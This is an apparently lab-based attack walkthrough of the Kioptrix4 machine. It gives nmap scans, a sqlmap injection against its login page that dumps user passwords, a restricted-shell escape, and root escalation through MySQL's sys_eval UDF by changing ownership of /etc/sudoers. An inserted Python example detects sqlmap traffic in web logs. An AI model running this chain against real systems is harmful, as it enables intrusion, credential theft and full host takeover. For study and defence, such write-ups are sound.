Scanning the host

# Host discovery
nmap -sn -r 192.168.1.1/24 --min-rate 5555

nmap -A 192.168.1.130 -oA nmap-result

-A: enables OS detection, version detection, script scanning and traceroute
PORT    STATE SERVICE     VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9bad4ff21ec5f23914b9d3a00be84171 (DSA)
|_ 2048 8540c6d541260534adf86ef2a76b4f0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 10h30m02s, deviation: 3h32m07s, median: 8h00m02s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2023-12-31T09:45:21-05:00

enum4linux-ng 192.168.1.130

Web

SQLMAP

Use Burp Suite to capture the request, save it to a file named 123, then run sqlmap against that file to test for SQL injection.

POST /checklogin.php HTTP/1.1
Host: 192.168.1.130
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.130
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.130/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

myusername=admin&mypassword=123&Submit=Login 123

sqlmap -r 123 --level 3 --batch

sqlmap identified the following injection point(s) with a total of 1428 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind

Type: time-based blind
---
sqlmap -r 123 --level 3 --batch -D members -T members --dump -C "username,password"

Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+
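An added example (not part of the original write-up, in Python): detection logic for the other side of the sqlmap run above. Blind boolean/time-based testing needs hundreds of requests against one parameter (1428 here), and sqlmap's default User-Agent announces itself, so both show up in the web server's access log. The code assumes Apache "combined" log format; the log lines are constructed, and the sqlmap version string is made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one Apache combined-format line; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def detect_sqlmap_activity(lines, endpoint="/checklogin.php", window_s=60, threshold=20):
    """Map client IP -> sorted reasons for clients whose traffic to `endpoint` looks like
    automated injection testing: sqlmap's User-Agent, or > `threshold` POSTs in `window_s` s."""
    posts, findings = defaultdict(list), defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != endpoint:
            continue
        if "sqlmap" in rec["ua"].lower():
            findings[rec["ip"]].add("sqlmap user-agent")
        if rec["method"] == "POST":
            posts[rec["ip"]].append(rec["ts"])
    for ip, stamps in posts.items():
        stamps.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(stamps):  # sliding window: widest run inside window_s
            while t - stamps[lo] > timedelta(seconds=window_s):
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            findings[ip].add(f"{peak} POSTs to {endpoint} within {window_s}s")
    return {ip: sorted(r) for ip, r in findings.items()}

def build_sample_log():
    """Constructed sample log (not real traffic): one normal login, then 30 sqlmap-UA POSTs from another host."""
    base = datetime(2023, 12, 31, 9, 45, 0, tzinfo=timezone(timedelta(hours=-5)))
    fmt = '{ip} - - [{ts}] "POST /checklogin.php HTTP/1.1" 200 87 "-" "{ua}"'
    lines = [fmt.format(ip="192.168.1.50", ts=base.strftime(TS_FMT), ua="Mozilla/5.0")]
    for i in range(30):
        ts = (base + timedelta(seconds=10 + i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="192.168.1.77", ts=ts, ua="sqlmap/1.7 (https://sqlmap.org)"))
    return lines
```

Real runs with a custom `--user-agent` or `--random-agent` only trip the rate check, so the request-burst rule is the one to keep even when the User-Agent match is quiet.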

Breaking out of the restricted shell

Try connecting over SSH

ssh john@192.168.1.130 -oHostKeyAlgorithms=+ssh-dss

The Linux shell is restricted: only the specified commands can be used.


Successfully escaped the restricted shell

Privilege escalation

Try sudo -l for privilege escalation; it lists the current user's sudo permissions.

john@Kioptrix4:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on Kioptrix4.

Look for files with the SUID bit set

find / -perm -u=s -type f 2>/dev/null

The following site can be used to look up how the relevant SUID binaries can be abused

GTFOBins

Try privilege escalation via MySQL

MySQL allows login without a password

Check whether the MySQL UDF library exists

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

Create the function

create function sys_eval returns string soname 'lib_mysqludf_sys.so';
mysql> select sys_eval('whoami');

+--------------------+
| sys_eval('whoami') |
+--------------------+
| root
|
+--------------------+
1 row in set (0.00 sec)

The command executed successfully

Change the owner and group of /etc/sudoers to the john user

select sys_eval('chown -R john:john /etc/sudoers');

and grant it write permission; after editing the file, save and exit, then restore the original permissions.